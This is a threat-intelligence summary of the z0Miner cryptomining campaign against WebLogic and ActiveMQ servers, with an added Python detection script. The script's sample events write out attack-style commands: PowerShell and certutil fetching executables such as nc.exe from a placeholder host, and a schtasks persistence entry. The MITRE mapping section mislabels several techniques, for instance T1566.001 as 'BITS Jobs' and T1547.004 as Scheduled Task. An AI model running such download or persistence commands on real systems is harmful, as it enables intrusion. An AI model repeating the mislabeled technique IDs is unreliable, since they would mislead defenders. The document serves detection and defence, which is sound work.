Full Report
Researchers observed threat actor z0Miner targeting Korean WebLogic servers as download servers for distributing malware, including miners and network tools. It is recommended to look for indicators of compromise in your environment, and if any are identified, remove the files...
Analysis Summary
# Tool/Technique: z0Miner Campaign Tools and Techniques
## Overview
The z0Miner campaign involves a threat actor (or group using the z0Miner moniker) targeting Korean WebLogic servers primarily for resource hijacking via cryptocurrency mining, using the compromised servers as download infrastructure for subsequent malware stages.
## Technical Details
- Type: Campaign Payload Distribution/Resource Hijacking
- Platform: Windows, Linux (targeting WebLogic/Apache ActiveMQ environments)
- Capabilities: Initial exploitation, webshell deployment, backdoor/remote access establishment, cryptomining payload delivery, persistence setup.
- First Seen: January 26, 2024 (Observed activity date)
## MITRE ATT&CK Mapping
This campaign utilizes several techniques across different stages:
- **Initial Access (TA0001)**
- T1190 - Exploit Public-Facing Application
- CVE-2020-14882 (WebLogic)
- CVE-2023-46604 (Apache ActiveMQ)
- **Execution (TA0002)**
- T1059.001 - Command and Scripting Interpreter: PowerShell (Windows downloads)
- T1566.001 - Internet Collection: BITS Jobs (implied by the download methods)
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell (used implicitly via command execution)
- T1059.006 - Command and Scripting Interpreter: Python (possible for custom scripts, though not explicitly named)
- **Persistence (TA0003)**
- T1547.004 - Boot or Logon Autostart Execution: Scheduled Task
- T1546.008 - Event Triggered Execution: WMI Event Subscription
- **Command and Control (TA0011)**
- T1090 - Proxy
- T1090.003 - Proxy: Multi-hop Proxy (Implied via FRP for RDP)
- **Lateral Movement (TA0008)**
- T1021.001 - Remote Services: Remote Desktop Protocol (Facilitated by AnyDesk and FRP tunneling)
- **Impact (TA0040)**
- T1496 - Resource Hijacking (Primary goal: Cryptomining)
## Functionality
### Core Capabilities
- **Vulnerability Exploitation:** Initial compromise achieved via known flaws in Oracle WebLogic (CVE-2020-14882) and Apache ActiveMQ (CVE-2023-46604).
- **WebShell Deployment:** Uploading JSP WebShells (JSP File Browser, Shack2, Behinder) to maintain access post-exploitation on the compromised servers.
- **Malware Distribution:** Using the compromised WebLogic server as a download facility for distributing subsequent payloads (miners, network tools).
- **Payload Fetching:** Using native OS tools (`powershell.exe`, `certutil.exe` on Windows, `curl` on Linux) to fetch and execute secondary stages.
### Advanced Features
- **Remote Access Establishment:** Deploying **Netcat** to establish reverse shell connections; the report notes that the outbound reverse connection is used to get around inbound firewall restrictions.
- **Alternative Remote Access:** Installation of **AnyDesk** in observed cases following ActiveMQ exploitation.
- **RDP Tunneling:** Utilizing **FRP** (default and customized versions) to facilitate Remote Desktop Protocol (RDP) communication, likely for persistent C2 or further internal lateral movement.
- **Persistence Mechanisms:** Establishing persistence through WMI Event Filters/Consumers or using the native Windows **Task Scheduler (`schtasks`)**.
- **Payload:** Distribution of various versions of **XMRig** for cryptomining on both Windows and Linux systems.
## Indicators of Compromise
*Note: Specific file hashes/IPs were not provided in the context; only tool names used.*
- File Hashes: [Not provided in context]
- File Names:
- XMRig executables (Windows/Linux variants)
- Netcat executables
- AnyDesk installer/executable
- JSP WebShell files (JSP File Browser, Shack2, Behinder)
- Registry Keys / WMI Repository: WMI Event Filters, Event Consumers and Filter-to-Consumer bindings created for persistence.
- Network Indicators: Traffic related to XMRig mining pools (destination unknown), C2 traffic over ports used by Netcat shells, FRP communication.
- Behavioral Indicators:
- Spawning of `powershell.exe` or `certutil.exe` initiating large outbound downloads/file drops.
- Creation of WMI persistence entries.
- Execution of scheduled tasks (`schtasks`) created seemingly by an exploited web process.
- High CPU usage indicative of cryptomining (XMRig execution).
## Associated Threat Actors
- z0Miner (Campaign/Actor designation used in the report)
## Detection Methods
- Signature-based detection: Signatures for known XMRig binaries or specific WebShell files.
- Behavioral detection: Monitoring for the abuse of `certutil.exe` or `powershell.exe` for remote file retrieval; monitoring for WMI/Task Scheduler modification by unusual parent processes (e.g., Java/WebLogic processes).
- YARA rules: Potentially targeting known patterns within the deployed JSP files or XMRig binaries.
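The behavioral indicators listed under Indicators of Compromise and the behavioral detection bullet above describe three observable patterns: a native tool (`certutil.exe`, `powershell.exe`, `curl`) being used to pull a remote file, a persistence mechanism (WMI subscription or `schtasks`) being created, and either of those happening under a parent process that should never spawn shells, such as the Java process hosting WebLogic. The following script is an added example, not code from the report or from any vendor; it runs those three rules over a handful of constructed process-creation records in Sysmon Event ID 1 style. The field names, the assumption that the WebLogic service appears as `java.exe`, and the sample hostnames (`*.example.invalid`) are all assumptions made for the example.

```python
"""Toy process-creation detection for the z0Miner-style behaviors in the report.

Added example: the rules and sample events are constructed for illustration and
are not the report's own detection content.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Parent images under which a WebLogic or ActiveMQ instance normally runs.
# Assumption: the Java service shows up as java.exe / java; adjust to your estate.
WEB_SERVICE_PARENTS = {"java.exe", "java"}
SHELLS = {"cmd.exe", "powershell.exe", "sh", "bash"}

# Command-line markers for remote file retrieval through native OS tools
# (the certutil / powershell / curl usage the report describes).
DOWNLOAD_MARKERS = {
    "certutil.exe": re.compile(r"-urlcache|-split|-f\s+https?://", re.I),
    "powershell.exe": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
        re.I),
    "curl": re.compile(r"https?://", re.I),
}

# Command-line markers for the two persistence mechanisms in the report
# (WMI event subscriptions and Task Scheduler).
PERSISTENCE_MARKERS = {
    "schtasks.exe": re.compile(r"/create", re.I),
    "powershell.exe": re.compile(
        r"register-wmievent|__eventfilter|commandlineeventconsumer|set-wmiinstance", re.I),
    "wmic.exe": re.compile(r"eventfilter|eventconsumer|filtertoconsumerbinding", re.I),
}


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 / auditd style fields)."""
    image: str
    parent_image: str
    command_line: str
    user: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return one finding dict per matched rule; an event may yield several."""
    findings = []
    for ev in events:
        img, parent = _base(ev.image), _base(ev.parent_image)
        from_web = parent in WEB_SERVICE_PARENTS
        base = {"image": img, "parent": parent, "user": ev.user}

        marker = DOWNLOAD_MARKERS.get(img)
        if marker and marker.search(ev.command_line):
            findings.append({**base, "rule": "lolbin_download",
                             "severity": "high" if from_web else "medium"})

        marker = PERSISTENCE_MARKERS.get(img)
        if marker and marker.search(ev.command_line):
            findings.append({**base, "rule": "persistence_create",
                             "severity": "high" if from_web else "medium"})

        # A web/application server process should not be launching shells at all.
        if from_web and img in SHELLS:
            findings.append({**base, "rule": "web_process_spawned_shell", "severity": "high"})
    return findings


def summarize(findings):
    """Count findings per rule name."""
    return dict(Counter(f["rule"] for f in findings))


# Constructed sample events (not from the report): four suspicious, one benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\java\bin\java.exe",
              "powershell -c (New-Object Net.WebClient).DownloadFile('http://dl.example.invalid/x.exe',"
              "'C:\\Windows\\Temp\\x.exe')", "NT AUTHORITY\\SYSTEM"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              "certutil -urlcache -split -f http://dl.example.invalid/nc.exe nc.exe", "WEBLOGIC\\svc"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", r"C:\java\bin\java.exe",
              "schtasks /create /sc minute /mo 5 /tn Update /tr C:\\Windows\\Temp\\x.exe",
              "NT AUTHORITY\\SYSTEM"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              "powershell Get-Process", "CORP\\alice"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\java\bin\java.exe", "cmd /c whoami",
              "NT AUTHORITY\\SYSTEM"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] {f['rule']:26} {f['parent']} -> {f['image']} ({f['user']})")
    print(summarize(detect(SAMPLE_EVENTS)))
```

The parent-process check is what separates this from a generic LOLBin signature: a download by `certutil.exe` under an interactive `cmd.exe` is rated medium because administrators do use it, while the same download, or a `schtasks /create`, launched directly beneath the Java process hosting WebLogic is rated high because the report ties that lineage to post-exploitation activity. On a real estate, feed the function from your EDR or Sysmon export and extend `WEB_SERVICE_PARENTS` with the actual service images of your WebLogic and ActiveMQ installs.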
## Mitigation Strategies
- **Patching:** Immediately apply patches for known vulnerabilities in WebLogic (CVE-2020-14882) and Apache ActiveMQ (CVE-2023-46604).
- **Application Hardening:** Implement strict Web Application Firewall (WAF) rules or context-aware access controls to prevent the upload or execution of JSP files in web application directories.
- **Network Segmentation:** Restrict outbound connections from WebLogic/application servers to the endpoints they actually need, so that communication with mining pools or external C2 infrastructure is blocked by default.
- **Monitoring:** Monitor for the creation of persistence mechanisms (WMI subscriptions, scheduled tasks) originating from non-standard users or processes.
- **Recovery:** Redeploy workloads from a known clean state upon identification of compromise.
## Related Tools/Techniques
- **XMRig:** Popular open-source Monero cryptomining software.
- **Netcat (nc):** Used extensively for basic networking tests, shell establishment, and C2 communication.
- **FRP:** Used here as a tunneling/proxy tool, potentially creating reverse connections or obfuscated RDP channels.
- **JSP WebShells (Behinder/Shack2):** Common post-exploitation tools providing file browsing and execution capabilities via the web server context.
- **AnyDesk:** Used as an additional, legitimate remote access solution for maintaining persistent access.